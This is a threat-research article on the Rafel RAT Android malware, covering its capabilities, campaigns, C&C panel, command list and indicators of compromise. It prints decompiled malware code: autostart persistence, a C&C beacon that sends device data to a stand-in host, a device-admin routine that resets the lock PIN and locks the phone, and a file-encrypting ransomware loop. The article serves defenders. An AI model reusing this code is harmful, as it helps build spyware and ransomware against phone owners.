Android
RAT
Encryption
Explore how Rafel RAT exploits vulnerabilities in outdated Android devices, orch...
Rafel RAT is an open-source malware tool designed to operate stealthily on Android devices. This powerful remote administration toolkit enables malicious actors to conduct a range of nefarious activities, from data theft to device manipulation.
Recent investigations by CP Research have made it evident that it is currently used by multiple threat actors, including espionage groups.
This [Threat Research](https://www.secureblink.com/threat-research) analysis will rigorously dissect the critical nuances of Rafel RAT, its operational mechanisms, and the broader implications of its deployment.
### Key Features and Capabilities
Rafel RAT boasts a suite of features that facilitate its covert operations. These include:
- **Admin Permission:** Grants the malware elevated privileges.
- **Whitelist Inclusion:** Ignore battery optimization, ensuring persistence.
- **Legitimate Appearance:** Disguised as a legitimate mod app.
- **Background Execution:** Operates even when the app is closed (limited device compatibility).
- **Accessibility Features:** Utilizes accessibility services, although this may cause errors on some devices.
- **Android Support:** Compatible with Android versions 5 through 12.
- **Wakelock Acquisition:** Prevents the device from sleeping.
- **Undetectability:** Bypasses PlayProtect, making it challenging to detect.
- **Device Manipulation:** Can wipe the SD card, lock the device screen, change wallpaper, vibrate the device, delete call logs, and notify victims via Discord.
- **Notification Theft:** Steals notifications and sends them through Discord.
- **AutoStart Capability:** Configured for devices from manufacturers like Poco, Xiaomi, Oppo, Vivo, LetV, and Honor.
### Campaigns and Victim Analysis
The deployment of Rafel RAT spans approximately 120 distinct malicious campaigns, targeting high-profile organizations, including military sectors. Victims predominantly hail from the United States, China, and Indonesia, but the geographic spread is extensive.
Notably, Samsung devices were most frequently targeted, followed by Xiaomi, Vivo, and Huawei. The malware’s ability to extract sensitive information, such as phonebook contacts and two-factor authentication messages, poses significant risks, enabling lateral movement within organizations.
### Technical Analysis
#### Permission Request Mechanism
Upon initiation, Rafel RAT seeks essential permissions to ensure its operations. The auto start function exemplifies this approach, modifying the device's settings to guarantee persistence.
```java
private void autostart() {
try {
Intent intent = new Intent();
String manufacturer = android.os.Build.MANUFACTURER;
if ("xiaomi".equalsIgnoreCase(manufacturer)) {
intent.setComponent(new ComponentName("com.miui.securitycenter", "com.miui.permcenter.autostart.AutoStartManagementActivity"));
} else if ("oppo".equalsIgnoreCase(manufacturer)) {
intent.setComponent(new ComponentName("com.coloros.safecenter", "com.coloros.safecenter.permission.startup.StartupAppListActivity"));
} else if ("vivo".equalsIgnoreCase(manufacturer)) {
intent.setComponent(new ComponentName("com.vivo.permissionmanager", "com.vivo.permissionmanager.activity.BgStartUpManagerActivity"));
} else if ("Letv".equalsIgnoreCase(manufacturer)) {
intent.setComponent(new ComponentName("com.letv.android.letvsafe", "com.letv.android.letvsafe.AutobootManageActivity"));
} else if ("Honor".equalsIgnoreCase(manufacturer)) {
intent.setComponent(new ComponentName("com.huawei.systemmanager", "com.huawei.systemmanager.optimize.process.ProtectActivity"));
}
List<ResolveInfo> list = getPackageManager().queryIntentActivities(intent, PackageManager.MATCH_DEFAULT_ONLY);
if (list.size() > 0) {
startActivity(intent);
}
} catch (Exception e) {
Log.e("exc", String.valueOf(e));
}
}
```
### Phishing and Deception Tactics
Rafel RAT leverages deceptive tactics to manipulate user trust and exploit interactions. It often impersonates legitimate applications like Instagram, WhatsApp, e-commerce platforms, antivirus programs, and support apps. These deceptive strategies enhance its ability to evade detection and gain necessary permissions.
![Malware Activity.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Malware_Activity_469e641652.jpg)
***Malware Activity [CP Research](https://research.checkpoint.com/2024/rafel-rat-android-malware-from-espionage-to-ransomware-operations/)***
#### Background Service Operations
Once activated, Rafel RAT deploys a background service to manage communication with the command-and-control (C&C) server.
```java
@Override // android.app.Service
public int onStartCommand(Intent intent, int flags, int startId) {
String input = intent.getStringExtra("inputExtra");
this.createNotificationChannel();
PendingIntent pendingIntent = PendingIntent.getActivity(this, 0, new Intent(this, MainActivity.class), 0);
Notification notification = new NotificationCompat.Builder(this, CHANNEL_ID)
.setContentTitle("Foreground Service")
.setContentText(input)
.setSmallIcon(R.drawable.ic_notification)
.setContentIntent(pendingIntent)
.build();
startForeground(1, notification);
return START_NOT_STICKY;
}
```
The InternalService initializes communication, activates location tracking, and sets up Text-To-Speech components.
```java
private void init() {
new Builder().setContext(this.context).setMode(0).setPrefsName("prefs").setPrefsMode(0).build();
this.deviceUniqueId = new EasyIdMod(this.context).getPseudoUniqueID();
this.getDeviceInfo();
this.checkCmdFromServer();
this.startLocationService();
this.prepareTTs();
}
```
### Communication Protocols
Communication with the C&C server occurs over HTTP(S) protocols. Initial client-server interactions involve transmitting device information, including identifiers, locale, country, model specifics, and operator details.
```plaintext
POST /Server_Panel/public/commands.php HTTP/2
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 246
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.10.0
country=US&total_ram=1.811512&unique_id=abcdefg12345&device_model=LGE-Nexus%205&device_language=en&is_rooted=false&software_version=Android%206.0.1&sim_operator=&charge=42%
```
### Command Execution
The range of commands supported by Rafel RAT is extensive. Commands include:
- **rehber_oku:** Exfiltrates the phone book.
- **sms_oku:** Extracts all SMS messages.
- **send_sms:** Sends SMS messages.
- **device_info:** Transmits device information.
- **location_tracker:** Sends live location data.
- **arama_gecmisi:** Exfiltrates call logs.
- **screen_message:** Displays a floating message.
- **wipe:** Deletes specified files.
- **LockTheScreen:** Locks the device screen.
- **ransomware:** Initiates file encryption.
- **changewallpaper:** Changes the device wallpaper.
- **vibrate:** Vibrates the device for 20 seconds.
- **deletecalls:** Wipes call history.
- **voice_message:** Uses Text-to-Speech to relay messages.
- **get_list_file:** Sends directory tree information.
- **upload_file_path:** Uploads specific files.
- **application_list:** Lists installed applications.
### Defensive Measures and Evasion Tactics
Rafel RAT employs several protective mechanisms to evade detection and disrupt analysis. These include string encryption, usage of packers, and anti-evasion techniques designed to bypass automated analysis tools.
### Command & Control Interface
The C&C interface for Rafel RAT is a PHP-based panel that does not require a traditional database. Instead, it utilizes JSON files for storage and management. Upon logging in, threat actors can access detailed information about infected devices and execute various commands.
![9MGUJS4ZGU-rId70.webp](https://sb-cms.s3.ap-south-1.amazonaws.com/9_MGUJS_4_ZGU_r_Id70_19bb8c2da0.webp)
***Admin Panel***
#### Panel Features
- **Device Information:** Phone model, Android version, geographical context, SIM operator, battery charge, and root status.
- **Commands:** Retrieve contacts, SMS messages, device info, call logs, and location data. Execute ransomware, change wallpapers, lock screens, and more.
### Case Studies and Campaigns
#### Ransomware Operations
Rafel RAT's ransomware capabilities include locking the screen and encrypting files using AES encryption. The malware can change the lock-screen password, preventing users from revoking admin privileges.
```java
public class DeviceAdminComponent extends DeviceAdminReceiver {
private static final String OUR_SECURE_ADMIN_PASSWORD = "1234";
public CharSequence onDisableRequested(Context context, Intent intent) {
ComponentName localComponentName = new ComponentName(context, DeviceAdminComponent.class);
DevicePolicyManager localDevicePolicyManager = (DevicePolicyManager) context.getSystemService(Context.DEVICE_POLICY_SERVICE);
if (localDevicePolicyManager.isAdminActive(localComponentName)) {
localDevicePolicyManager.setPasswordQuality(localComponentName, DevicePolicyManager.PASSWORD_QUALITY_NUMERIC);
localDevicePolicyManager.resetPassword(OUR_SECURE_ADMIN_PASSWORD, DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY);
localDevicePolicyManager.lockNow();
}
return super.onDisableRequested(context, intent);
}
}
```
Additionally, the malware incorporates file encryption methods.
```java
public void encryptFile() throws Exception {
for (File file : files) {
if (!file.getPath().contains(".enc")) {
byte[] enc = Aes.encrypt(KEY, fullyReadFileToBytes(file));
file.delete();
saveFile(enc, file.getPath() + ".enc");
}
}
}
```
### Threat Actors and Government Infrastructure
One notable case involved a threat actor hacking a Pakistani government website and using it as a C&C server for Rafel RAT. The hacker publicly celebrated the breach, highlighting the threat's potential impact on government infrastructure.
### Indicators of Compromise (IOCs)
- **SHA256 Hashes:**
- d1f2ed3e379cde7375
f2ec6f5e2a720151c25bb504abe376a3488a69df540a42
- b9af3d728dd5fc1a7ad08675e0845e375db9f4b0bfa33eb7d0338cc8d8d8e2b6
- **IP Addresses:**
- 194.31.98.10
- 185.116.237.245
- **Domains:**
- psks.to
- casperbc.com
- raas.site
- **Files:** Indicators from various campaigns including MD5 hashes, email addresses, and additional IP addresses.
### Conclusion
Rafel RAT represents a sophisticated and versatile threat to Android devices, with wide-ranging capabilities from espionage to ransomware deployment. Its deployment in numerous campaigns targeting high-profile sectors underscores its danger. Understanding its inner workings, from permissions to C&C communication, equips cybersecurity professionals to better defend against and mitigate this threat.